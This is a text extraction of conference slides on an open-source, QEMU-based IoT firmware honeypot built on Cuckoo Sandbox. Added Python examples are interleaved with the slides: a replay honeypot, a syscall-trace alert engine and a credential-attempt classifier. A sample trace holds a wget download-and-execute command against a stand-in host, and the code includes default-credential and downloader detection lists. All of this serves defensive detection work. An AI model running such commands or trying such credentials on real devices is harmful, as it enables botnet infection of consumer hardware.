NCSC One: IoT Honeypot Pieter Jansen & Jurriaan Bremer


Post on 16-Aug-2020


Page 1: NCSC One: IoT Honeypot · 2018. 12. 11. · Cuckoo Sandbox 4. Project 5. Architecture 6. Offline demo 7. Roadmap. Introduction. Pieter Jansen - CEO @ Cybersprint - - Team of 25 enthusiasts

NCSC One: IoT Honeypot

Pieter Jansen & Jurriaan Bremer

Page 2

On the agenda:

1. Introduction
2. SBIR
3. Cuckoo Sandbox
4. Project
5. Architecture
6. Offline demo
7. Roadmap

Page 3

Introduction

Page 4

Pieter Jansen

- CEO @ Cybersprint
- https://cybersprint.com
- Team of 25 enthusiasts
- Since 2015
- 100% Dutch

- Digital Risk Protection services

Page 5

Jurriaan Bremer

- CEO, Hatching
- https://hatching.io/

- Lead Developer, Cuckoo Sandbox
- https://cuckoosandbox.org/

- 6+ years development on Cuckoo

- Growing R&D team

Page 6

SBIR

This SBIR project is co-funded by the Internal Security Fund of the European Union

Balancing Security and Mobility

Page 7

Page 8

SBIR

- EU co-funded Project

- SBIR stage 1 (feasibility)

- SBIR stage 2 (realisation)

- SBIR stage 3 (valorisation)

- https://www.rvo.nl/subsidies-regelingen/sbir

You are here

Page 9

Cuckoo Sandbox

Page 10

Cuckoo Sandbox

- Leading open source automated malware analysis project
- https://cuckoosandbox.org/

- Widely used throughout the security community

- Hatching is the driving force behind the majority of Cuckoo innovations

- Cuckoo forms basis of the IoT Honeypot project

Page 11

Page 12

Project

Page 13

- Goal: develop a firmware-based, open source Internet of Things (IoT) honeypot framework

- Consumer network devices, e.g., those used by NCSC.NL personnel at home
  - IP cameras, smart devices, etc.

- Reason: Mirai, Hajime, etc.

Project [1/2]

Page 14

Page 15

Hajime Botnet Makes a Comeback With Massive Scan for MikroTik Routers

Page 16

Project overview - replication vs emulation

Page 17

Replication-approach

1. Connect to an IoT device
2. Store the conversation (example: HTML files)
3. Spin up a service on the same port/protocol
4. Playback the earlier captured conversation
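The four steps above, as a minimal record-and-replay honeypot. This is an added example, not code from the project or the speakers: it assumes a previously captured raw HTTP response (the constructed CAPTURED_RESPONSE below stands in for a real IP camera capture), serves it unchanged on every path, and logs each inbound request. Note that the stock Python server would add its own Server and Date headers on top of the captured ones, which is exactly the kind of detail that gives a replayed decoy away; send_response_only() is used to avoid that.

```python
"""Record-and-replay HTTP honeypot sketch (hypothetical, not the project's code)."""
import http.server
import threading
import urllib.request
from datetime import datetime, timezone

# Constructed sample: a raw HTTP response "captured" from a hypothetical IP camera's
# login page (step 2 of the replication approach). Not a real device capture.
CAPTURED_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Boa/0.94.14rc21\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Length: 64\r\n"
    b"\r\n"
    b"<html><body><form action='/login'>user/pass</form></body></html>"
)


def parse_captured_response(raw):
    """Split a raw HTTP response into (status code, [(header, value), ...], body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return status, headers, body


class ReplayHandler(http.server.BaseHTTPRequestHandler):
    """Answer every request with the captured response (steps 3 and 4)."""

    captured = parse_captured_response(CAPTURED_RESPONSE)
    requests_seen = []  # shared log of inbound attempts; all a replay honeypot yields

    def _replay(self):
        status, headers, body = self.captured
        self.requests_seen.append({
            "time": datetime.now(timezone.utc).isoformat(),
            "peer": self.client_address[0],
            "method": self.command,
            "path": self.path,
            "authorization": self.headers.get("Authorization"),
        })
        # send_response_only() skips the stock "Server:"/"Date:" headers that
        # send_response() would add and that would expose the decoy.
        self.send_response_only(status)
        for name, value in headers:
            if name.lower() != "content-length":
                self.send_header(name, value)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    do_GET = _replay
    do_POST = _replay

    def log_message(self, fmt, *args):
        pass  # silence stdlib console logging; requests_seen is the record


def run_replay_honeypot(host="127.0.0.1", port=0):
    """Start the replay service in a background thread; port 0 picks a free port."""
    server = http.server.ThreadingHTTPServer((host, port), ReplayHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def probe(server, path="/"):
    """Fetch a path from the running honeypot; returns (status, Server header, body)."""
    host, port = server.server_address[:2]
    with urllib.request.urlopen(f"http://{host}:{port}{path}") as resp:
        return resp.status, resp.headers.get("Server"), resp.read()


if __name__ == "__main__":
    srv = run_replay_honeypot()
    print(probe(srv, "/login.htm"))
    print(ReplayHandler.requests_seen)
    srv.shutdown()
    srv.server_close()
```

The log shows why the approach stalled: whatever the visitor sends, the answer is the same login page, so the record contains attempts (paths, Basic-auth headers) but never an infection.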

Page 18

Replication-approach - conclusions

Easy to set up fake environments

Did not go past login screen

Was not convincing enough for attackers

Would only capture attempts, not infections

Page 19

Project [2/2]

- Replication alternative did not work

- Goal: create open source IoT Honeypotting framework
- Goal: detect large-scale IoT compromise campaigns
- Goal: detect new threats, generate new IoCs
  - Default credentials, exploits, etc
- Scales: run dozens of IoT devices using a single server
  - Without requiring the original hardware
  - Relatively low cost & maintenance effort


Page 20

Existing projects

- pyREbox, PANDA, DECAF, ISP RAS.

- x86-only (pyREbox) and x86/ARM (PANDA, different use-case)

- IoT firmware often ARM/MIPS/etc

Page 21

High-level project overview

- Emulate IoT firmware using QEMU
- Expose listening network services
  - Either to internal networks or public IPv4 / IPv6 addresses
- Instrument behavioral aspects of running firmware
- …
- Wait for device to be compromised!

Page 22

Goal of the project?

- Once a device is compromised, investigate :-)
  - Got system call traces and PCAPs
  - Reconstruct traffic to isolate exploit and/or payload
- Alternative use-case: honey tokens
  - Intentionally vulnerable devices with interesting names (e.g., FREDERIKSKAZERNE CAM51)
  - Notifies owners if attackers abuse it

Page 23

Architecture

Page 24

IoT Honeypot Architecture

Page 25

QEMU

Loading of firmware non-trivial:

- In practice most firmware is non-x86: ARM & MIPS
- Needs specific QEMU command-line parameters etc

Instrumentation of QEMU interesting:

- Not so much existing research on non-x86 QEMU VMI (Virtual Machine Introspection)
- Instrumentation required to learn what device is doing
  - E.g., logging system calls such as execve(2)

Page 26

Gathering results

- We obtain network traffic from the outside
- We obtain system calls from the device
- Realtime data processing
- Results stored for later research
- Alerts emitted to custom Dashboard
  - Known vulnerability was used
  - ...
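What the realtime processing of the device-side syscall log (page 25: logging execve(2), and this page's "alerts" and "IoCs") can look like, as an added example that is not the project's code. It assumes the VMI layer emits one JSON object per execve(2)/connect(2) event; the event format, the rule names and the trace below are all constructed for the example (addresses are TEST-NET), and the heuristics are the generic ones a practitioner would start with: execution from a writable directory, a downloader invoked with a URL, and the two chained into a download-and-execute alert. Only outbound connections of already-flagged processes become IoCs, so the device's own NTP traffic stays out of the indicator list.

```python
"""Turn per-device syscall events into alerts and IoCs (added sketch, not project code)."""
import json
import posixpath

# Directories an IoT device never legitimately executes binaries from.
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/var/run/")
# Programs whose execve with a URL argument marks a download stage.
DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}

# Constructed sample trace in the JSON-lines shape this example assumes the VMI
# layer emits (one execve(2)/connect(2) event per line). Addresses are TEST-NET.
SAMPLE_TRACE = """\
{"ts": 1.00, "pid": 311, "ppid": 1,   "syscall": "execve", "path": "/usr/sbin/httpd", "argv": ["httpd"]}
{"ts": 2.50, "pid": 412, "ppid": 311, "syscall": "execve", "path": "/bin/sh", "argv": ["sh", "-c", "cd /tmp; wget http://198.51.100.7/x.mips; chmod +x x.mips; ./x.mips"]}
{"ts": 2.60, "pid": 413, "ppid": 412, "syscall": "execve", "path": "/usr/bin/wget", "argv": ["wget", "http://198.51.100.7/x.mips"]}
{"ts": 2.61, "pid": 413, "ppid": 412, "syscall": "connect", "dst": "198.51.100.7:80"}
{"ts": 3.20, "pid": 414, "ppid": 412, "syscall": "execve", "path": "/bin/chmod", "argv": ["chmod", "+x", "x.mips"]}
{"ts": 3.30, "pid": 415, "ppid": 412, "syscall": "execve", "path": "/tmp/x.mips", "argv": ["./x.mips"]}
{"ts": 9.00, "pid": 500, "ppid": 1,   "syscall": "execve", "path": "/sbin/ntpd", "argv": ["ntpd", "-p", "pool.ntp.org"]}
{"ts": 9.10, "pid": 500, "ppid": 1,   "syscall": "connect", "dst": "203.0.113.9:123"}
"""


def parse_trace(text):
    """Parse JSON-lines trace text into a list of event dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def analyse(events):
    """Run the heuristics over events in order; return the alerts and the IoCs they produced."""
    alerts, iocs = [], set()
    downloaded = {}        # basename of a fetched file -> URL it came from
    suspicious_pids = set()
    for ev in events:
        pid = ev["pid"]
        if ev["syscall"] == "connect":
            # Only outbound connections of already-flagged processes become IoCs.
            if pid in suspicious_pids:
                iocs.add(ev["dst"].rsplit(":", 1)[0])
            continue
        if ev["syscall"] != "execve":
            continue
        path, argv = ev["path"], ev["argv"]
        if posixpath.basename(path) in DOWNLOADERS:
            for arg in argv[1:]:
                if "://" in arg:
                    iocs.add(arg)
                    downloaded[posixpath.basename(arg)] = arg
                    suspicious_pids.add(pid)
                    alerts.append({"rule": "downloader-with-url", "pid": pid, "url": arg})
        if path.startswith(WRITABLE_DIRS):
            suspicious_pids.add(pid)
            alerts.append({"rule": "exec-from-writable-dir", "pid": pid, "path": path})
            url = downloaded.get(posixpath.basename(path))
            if url:
                alerts.append({"rule": "download-and-execute", "pid": pid,
                               "path": path, "url": url})
    return {"alerts": alerts, "iocs": iocs}


if __name__ == "__main__":
    result = analyse(parse_trace(SAMPLE_TRACE))
    for alert in result["alerts"]:
        print(alert)
    print("IoCs:", sorted(result["iocs"]))
```

The three alerts this produces for the sample (downloader with URL, execution from /tmp, and the chained download-and-execute) are what would reach the dashboard; the URL and the contacted address are the IoCs kept for later research.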

Page 27

QEMU command-line usage, MIPS image

/home/jbr/git/quailbox-qemu/build/mips-softmmu/qemu-system-mips \
  -kernel /home/jbr/.quailbox/kernels/vmlinux-3.18.120-4kc-malta-cuckoo \
  -nographic \
  -netdev tap,id=net0,ifname=tap_qemu,script=no,downscript=no \
  -M malta -m 512 \
  -hda /home/jbr/.quailbox/images/ext2fs-for-netgear-wnap210.image \
  -device e1000,netdev=net0 \
  -display none \
  -append "console=ttyS0 rw root=/dev/sda init=/sbin/init"

Page 28

QEMU Tiny Code Generator (“TCG”)

- Efficient engine for translating ARM/MIPS/etc into an IL (Intermediate Language)
- IL translated into the native Host code, e.g., x86
  - Needs customization to add our VMI
- Syscall capturing for ARM+MIPS
  - Linux Kernel modifications & tracing WIP
  - Memory tracking & dumping logic
- Additional changes required for new bug classes
  - Instrumentation for specific applications etc

Page 29

Realtime tcpdump processing

- Log & process HTTP(s) requests from the outside
- Present network traffic to ruling engines
  - Suricata / Snort
  - Cuckoo / Proprietary Signatures
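A small "ruling engine" for the inbound HTTP requests this stage logs, as an added example that is not the project's own signature set or code. It takes requests as the tcpdump stage would hand them over (raw bytes, already reassembled), pulls credentials out of either an Authorization: Basic header or a form POST, and flags the attempt as a default-credential attempt when the pair is on a known-defaults list. The default-credential list, the form field names and the sample requests are constructed for the example; a malformed Basic header is handled rather than crashing the pipeline.

```python
"""Classify reassembled inbound HTTP requests for credential attempts (added sketch)."""
import base64
import binascii
from urllib.parse import parse_qs

# Constructed default-credential list; illustrative, not the project's signature set.
DEFAULT_CREDENTIALS = {("admin", "admin"), ("admin", "1234"), ("root", "root"), ("admin", "")}
# Form field names this example assumes the emulated device's login page uses.
USER_FIELDS, PASS_FIELDS = ("username", "user"), ("password", "pass")

# Constructed requests, as the realtime tcpdump stage would hand them over (TEST-NET host).
SAMPLE_REQUESTS = [
    b"GET / HTTP/1.1\r\nHost: 192.0.2.10\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    b"GET /cgi-bin/status HTTP/1.1\r\nHost: 192.0.2.10\r\n"
    b"Authorization: Basic YWRtaW46YWRtaW4=\r\n\r\n",
    b"POST /login.cgi HTTP/1.1\r\nHost: 192.0.2.10\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 33\r\n\r\n"
    b"username=admin&password=Tr0ub4dor",
    b"GET /x HTTP/1.1\r\nHost: 192.0.2.10\r\nAuthorization: Basic !!notbase64!!\r\n\r\n",
]


def parse_request(raw):
    """Split a raw request into method, path, lower-cased header dict and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path = lines[0].split(" ")[:2]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def extract_credentials(headers, body):
    """Return (user, password) from Basic auth or a login form, or None."""
    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        try:
            decoded = base64.b64decode(auth[6:], validate=True).decode("latin-1")
        except (binascii.Error, ValueError):
            return None  # malformed header: nothing to match against
        user, _, password = decoded.partition(":")
        return user, password
    if "application/x-www-form-urlencoded" in headers.get("content-type", ""):
        form = parse_qs(body.decode("latin-1"), keep_blank_values=True)
        user = next((form[f][0] for f in USER_FIELDS if f in form), None)
        password = next((form[f][0] for f in PASS_FIELDS if f in form), None)
        if user is not None and password is not None:
            return user, password
    return None


def scan_requests(raw_requests, peer="203.0.113.5"):
    """Emit one alert per request carrying credentials; mark known defaults."""
    alerts = []
    for raw in raw_requests:
        method, path, headers, body = parse_request(raw)
        creds = extract_credentials(headers, body)
        if creds is None:
            continue
        rule = "default-credential-attempt" if creds in DEFAULT_CREDENTIALS else "credential-attempt"
        alerts.append({"peer": peer, "method": method, "path": path,
                       "credential": creds, "rule": rule})
    return alerts


if __name__ == "__main__":
    for alert in scan_requests(SAMPLE_REQUESTS):
        print(alert)
```

In the deployed pipeline this sits beside Suricata/Snort rather than replacing them: the engine rules catch known exploit traffic, while credential classification of this kind is what turns a login attempt into the "default credentials" IoC category the project lists.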

Page 30

Offline Demo

Page 31

Page 32

Page 33

Page 34

Page 35


Page 36

Roadmap

Page 37

Roadmap

- Create web interface for managing virtual IoT environments
- “Load” support for many more firmware images
- Tailored QEMU VMI support for:
  - Different CPU architectures
  - Different known versions of Linux kernel for allowing in-depth VMI
    - E.g., through Volatility / Rekall integration
- Documentation of more relevant bug classes
- Capability for identifying said bug classes
- Protection against QEMU breakouts..
- Interaction through simulation of peripherals like camera/files/sensors
- OT/SCADA/ICS applications (virtual Borssele)
- So much more.. ;-)

Page 38

Valorization

Page 39

Valorization: Commercial Applications

- Fuzzing as a Service
  - Provide security testing services for hardware providers, allowing large scale/automated testing for any firmware
- Commercial / open source bespoke additions for specific use-cases
  - OT-applications, applications for non-standard firmware
- Hosting of virtual IoT Environments
  - Creating virtual 'digital twin' of sensitive IoT environments for research purposes
  - Collect threat intelligence to support adversary attribution research

Page 40

How you can help

1. Share your firmware

2. Provide testing grounds

3. Spread the word!

Page 41

Credits

The HoneyNED project team

Andrei Costin ([email protected]), Assistant Professor in Cybersecurity/IoT, welcomes research and collaboration opportunities